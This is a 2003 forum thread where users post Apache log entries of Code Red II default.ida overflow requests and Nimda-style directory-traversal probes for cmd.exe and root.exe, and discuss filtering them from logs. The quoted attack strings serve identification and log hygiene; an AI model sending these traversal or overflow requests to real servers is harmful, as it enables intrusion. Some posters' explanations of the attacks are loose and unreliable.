Looking through my log files to help someone a little while ago, I noticed:
12.218.208.223 - - [02/May/2003:21:23:52 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 268
and
12.218.221.166 - - [02/May/2003:21:32:54 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 268

Both are exactly the same URL, and to default.ida. If I remember correctly, default.ida is what the Code Red II attacked, and with a request string similar to that.

I'm on Windows XP with an Apache 1.3.27 server. Any idea on what to do to stop it?

Yeah, that looks like a Code Red attack to me: only IIS servers with indexing service turned on are vulnerable to it - Apache just goes "Huh".

As for stopping it, I guess you could block the offending IPs at the firewall... but that could end up being a pretty broad mask.

Today, I find this lovely block:
12.224.192.202 - - [03/May/2003:00:58:43 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 273
12.224.192.202 - - [03/May/2003:00:58:44 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 271
12.224.192.202 - - [03/May/2003:00:58:44 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 281
12.224.192.202 - - [03/May/2003:00:58:44 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 281
12.224.192.202 - - [03/May/2003:00:58:45 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
12.224.192.202 - - [03/May/2003:00:58:46 -0500] "GET /vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
12.224.192.202 - - [03/May/2003:00:58:47 -0500] "GET /mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
12.224.192.202 - - [03/May/2003:00:58:47 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
12.224.192.202 - - [03/May/2003:00:58:47 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
12.224.192.202 - - [03/May/2003:00:58:48 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
12.224.192.202 - - [03/May/2003:00:58:48 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
12.224.192.202 - - [03/May/2003:00:58:49 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
12.224.192.202 - - [03/May/2003:00:58:49 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 278
12.224.192.202 - - [03/May/2003:00:58:50 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 278
12.224.192.202 - - [03/May/2003:00:58:50 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
12.224.192.202 - - [03/May/2003:00:58:50 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
203.241.248.20 - - [03/May/2003:01:20:27 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
12.232.200.217 - - [03/May/2003:02:06:17 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 268
195.199.67.125 - - [03/May/2003:04:36:27 -0500] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -

As you notice, most of them are from the same ip. Any clue as to why I'd be attacked? Or by multiple people?

195.199.67.125

inetnum: 195.199.67.64 - 195.199.67.127
netname: SULI-707
descr: 'Ganz Abraham' Technical Secondary School
descr: Zalaegerszeg
country: HU
admin-c: IT820-RIPE
tech-c: MP9905-RIPE
status: ASSIGNED PA
mnt-by: RIPE-NCC-NONE-MNT
changed: hostmaster@elender.hu 20000419
source: RIPE

School h4x0rz hehe

Originally posted by Mordecai
Today, I find this lovely block:

<SNIP>

As you notice, most of them are from the same ip. Any clue as to why I'd be attacked? Or by multiple people?

Idiocy.

These people sit on Windows 2000 boxes that they bought for home use prior to Nimda/Code Red, most likely. Probably on a cable modem. In Arkansas. Without any virus protection. No patches. Never been to Windowsupdate. Et C...

Makes me sick :rolleyes:

yeah. My parents had 9 viruses when i forced them to instal PC CILLIN a couple weeks ago after they called me to reinstall windows... 9 freaking viruses

no firewall, no anti-virus (still)...

There was one IP which I reported (none of these, it appears the one I reported was manual) to the ISP and to the person it was meant to attack. It was an attempt at connecting to an SMTP server.

Likely ye olde

CONNECT maila.microsoft.com:25

which is now oft substituted with some open relays in Russia or someplace?

I have to admit, I've gotten tired or reading this @#$@# and don't even read the other log entries much anymore. Anybody got a good tool, or scheme, for dealing with Apache logs?

Originally posted by Mordecai
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir

This is a unicode, used to enter a webserver. mostly used by "hackers", with the goal to start a FTP-Server.

Keep an eye on the map: c:\inetpub\scripts\
When some1 succesfully entered your server, you probably find a copy of "cmd.exe" there.

Originally posted by Mordecai
GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 268

This one looks like a WebDav unicode, some1 tries to enter your webserver. No real harm can be done to your system, he/she probably only wants to abuse your bandwith, but be carefull, when they exceed in entering and starting the FTP service (Serv-u FTP Server), they can use your system to scan other ranges.

But I think they wont come that far to start the service.

I can guarantee they won't make it in using any means like that. Not only am I not on IIS (rendering Code Red useless), I have a few security measures which might stop them.

The only thing I worry about it how much bandwidth it'll use if they keep coming.

If you're already to the point of annoying your ISP with your usage, maybe. And you might be...you seem to have a good proj or two available.

Otherwise, a few HTTP requests more/less probably aren't making much of a difference. I'm of the opinion that lots of these are dumb bots/infected boxen. I guess if it's scrIp+ kldD33Z who're using automated scanners and they think that your Class A has more interest than some others, these should be on the decrease. Seems to me I saw more of it last year than I am now.

Hard to believe, but that damn code red is still around. I recently got a new web server for develpment purposes, and the only hits on it other than from me are from that damned worm.

Luckily, I'm on Linux/Apache. Code Red can go you-know-what itself. It's just a nuisance when I need to check the error log. I need to write a script to filter that stuff out.

• keith

Originally posted by keith73
Hard to believe, but that damn code red is still around. I recently got a new web server for develpment purposes, and the only hits on it other than from me are from that damned worm.

Luckily, I'm on Linux/Apache. Code Red can go you-know-what itself. It's just a nuisance when I need to check the error log. I need to write a script to filter that stuff out.

• keith [/B]

Would you share/sell it when you get it done...I've been too lazy or too busy....?

Originally posted by dalecosp
Would you share/sell it when you get it done...I've been too lazy or too busy....?

I'd gladly share it, but now that you've asked, there's that much more pressure on me to do one. DO'H.

I usually have a script in a protected area of the site that will just read the last few lines of the error log, for when I'm debugging stuff. I wasn't talking about a log parser or anything.

Could just write one that reads in the error log and removes all code red lines, but saves the rest back to the file.

what does everyone else think?

• keith

Just run something that goes through each line and checks if there are at least one of three things: root.exe, cmd.exe, default.ida

If any of these exist, erase that line.

At the end, loop through the array, and, if the line is not blank, write it to the file.

Seems pretty simple.

The problems are, IMHO: the size of the array needed <? could be wrong about that ?> and the fact that the logdirs are often not accessible to the web user (and I don't want them to be.)

Maybe I could do something with the PHP binary and add it to root's crontab.....

No, no, you don't want to share the log dirs. You could manually run it through every couple of days (or crontab it), though.
Yes, the size would matter a lot. PHP by default can only use 8MB of memory per script, which means a very large log file will kill the script, and probably time out (PHP by default times out after 30 seconds).

If you rotate your logs (rename for every day), it'll work better, but not if you have a LOT of traffic (8MB+ every day in lines).

Yah, those are my concerns as well, although the php CLI max_execution (CLI >= 4.3.0) is limitless. I thought it might be interesting to try this idea; I got a little stuck when I found that the PHP binary I keep lying around (the webserver has the Apache module instead) was still 4.1.1 ...

I built again last night, but the version that installed was the CGI, so I've gotta go back in and install the CLI instead.

I figured now that I'm getting pretty good at PHP, shell scripting with it would be easy. But, it seems I'm gonna have to break down and read about that, too...and just when "C for dummies" was getting interesting

If I tried long enough, I could probably write a C shell script (dangerous tho' it may be) that would pipe the log through grep(1) and write to a seperate file, or something. I was just hoping that with PHP it'd be a 15-minute hack....